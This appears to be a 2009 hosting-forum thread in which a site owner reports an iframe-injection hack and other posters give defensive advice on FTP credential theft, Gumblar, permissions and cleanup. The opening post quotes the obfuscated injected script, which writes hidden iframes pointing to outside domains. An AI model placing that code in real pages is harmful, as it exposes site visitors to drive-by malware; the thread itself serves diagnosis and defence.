  1. #1

    Securing Website - hacked

    We have a simple Flash site. Not a CMS or anything of that sort.

    Recently our site was hacked. Nothing malicious, as the only code that seems to have changed was our index file, in which they injected a malware script:
    Code:
    "</script>
    <BODY bgcolor="#A19D9A"><script>document.write("<iframe" +" sr"+"c=h" +"t"+"tp://delzz" +"erro.c"+"n/ " +"he"+"ight=1 "+"widt" +"h=1"+"></ifr" +"a" +"me"+">");</script><script>document.write("<if"+"rame "+"s" +"r"+"c=http:/"+"/u" +"pd"+"ateda" +"te"+".cn"+"/ " +"hei"+"g"+"h"+"t=1" +" "+"wi"+"dth="+"1"+"><"+"/ifram"+"e" +">");</script><script>document.write("<i" +"fra" +"me "+ "s" +"r" +"c=http:" +"/" +"/"+ "u"+ "pdate" +"d" +"a" +"te." +"c" +"n" +"/" +" h" +"e" +"i" +"ght=1 " +"wid" +"t" +"h=1" +"><" +"/ifr"+ "am"+ "e" +">")</script><script>eval("d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&]('(&@)&]<i[@&%^f$^!%r[@&%^a((*)&!m$[[^@&e$[[^@& (&@)&]s[@&%^rc[@&%^=$^!%h$[[^@&t$^!%t$[[^@&p$[[^@&:((*)&!/(&@)&]/$^!%u$[[^@&p[@&%^d[@&%^a[@&%^t$^!%e$[[^@&da((*)&!t$^!%e(&@)&].[@&%^c(&@)&]n/$^!% $^!%h(&@)&]e(&@)&]i$[[^@&g$[[^@&h$^!%t$^!%=$^!%1$[[^@& [@&%^w$[[^@&i((*)&!d(&@)&]th(&@)&]=1(&@)&]></((*)&!i$[[^@&f((*)&!r$^!%a$^!%m((*)&!e>'$^!%)$[[^@&;[@&%^".replace(/\(\&\@\)\&\]|\$\^\!\%|\(\(\*\)\&\!|\$\[\[\^\@\&|\[\@\&\%\^/ig, ""))</script>"


    Short of compromised FTP usernames/passwords, what other vulnerabilities should I check for as well, short of the physical web hosting server being compromised?
    We are currently hosting with Mosso.
    Last edited by bear; 07-20-2009 at 07:54 AM. Reason: code tags added

  2. #2
    Well, have you considered that there might be vulnerabilities in the host's control panel system?

    The host might not have updated their control panel system. Hence, it might have some dangerous security flaws that allow hackers to gain control of your site.

  3. #3
    The basic idea is that an attacker loads the content of an external site into the site, sets the external content to be invisible and then overlays the page you're looking at. When you click a link you see on the current page, you are in fact clicking on the externally loaded page and about to load pretty much whatever the attacker wants.

    The attack usually has two steps. The first one is password harvesting and the next one is mass modification of files.

    Even if only one FTP account on the entire server is compromised, it is enough for all other sites to be injected.

    Always make sure none of your directories have 777 permissions.

    Also there is a chance for the intruder to install some kinds of c shells and execute a loop which will modify all index files on the server.

    The most probable way for this to be done is by a compromised FTP account.

  4. #4
    Join Date
    Jun 2006
    Location
    NYC
    Posts
    1,446
    Quote Originally Posted by adminpj
    The most probable way for this to be done is by a compromised FTP account.
    Compromised FTP account or some vulnerable scripts running on your site.

    First thing I'd do is bring the box down. Do a full once-over and/or a complete rollback.

    Check all of the logs and make sure this isn't someone that came in through a brute-forced account, etc.

  5. #5
    Hi,

    First of all you need to confirm this malicious code is not inserted into other files. We can search for the code and replace it using a script.

    Please follow these steps on the server:

    1) Change your root password
    2) Change the password of the concerned FTP username
    3) Enable Apache suEXEC and compile PHP as suPHP
    4) Install latest security tools like mod_sec etc
    5) Secure /tmp
    6) Scan the server frequently with latest scanning tools

  6. #6
    Hi,

    You have malware on your PC, or on someone's PC that used the FTP password for your hosting.

    what you need to do:

    1. Check your PC with antivirus
    2. Change FTP/email/control panel passwords
    3. Be happy

  7. #7
    There is a known compromise floating around now that actually resides on the client computer that normally FTPs data to a server, which gathers the plaintext FTP passwords used in the FTP client app. This is, from what has been seen, based on iframes, which sure fits your report.
    If this is the case, you need to change your FTP password on the server from a clean computer, then set about cleaning up the compromised workstation.

    Some info - http://www.pdgsoft.com/blog/archives/108

  8. #8
    It looks like something one would receive from a malware site, which would mean someone was browsing the internet on the server(s) that are hosting your site.

  9. #9
    Try changing your FTP client. FileZilla is a good one.

  10. #10
    File permissions: you're most likely using suPHP, so double-check your permissions, 644 for files and 755 for folders. Not more!

  11. #11
    Securing your scripts and also securing your PC.

  12. #12
    Try changing your FTP client. FileZilla is a good one.
    Except it is as vulnerable as all the others if the PC is infected with Gumblar etc.

  13. #13
    Exactly...if he's already infected with a Gumblar strain, changing FTP clients will be of little use.
    Nothing you can do on the server side, except resetting your FTP passwords (which you should do immediately anyway), will help. It's totally a client-side issue.

  14. #14
    It is a typical iframe injection from compromised FTP credentials as many have mentioned above.

    Install a new anti-virus program on all the PCs with FTP access to your site. The reason for this is that the virus obviously knows how to evade detection by your current AV program.

    We've had good success recommending AVG, Avast or Avira.

    Then scan and clean the PCs with the new AV program.

    Then and only then can you change the FTP passwords. Change all of them if you have more than one FTP account on your site. If you have FTP access to any other sites, you had better change those passwords as well as they're either already hacked or will be very soon through the same method.
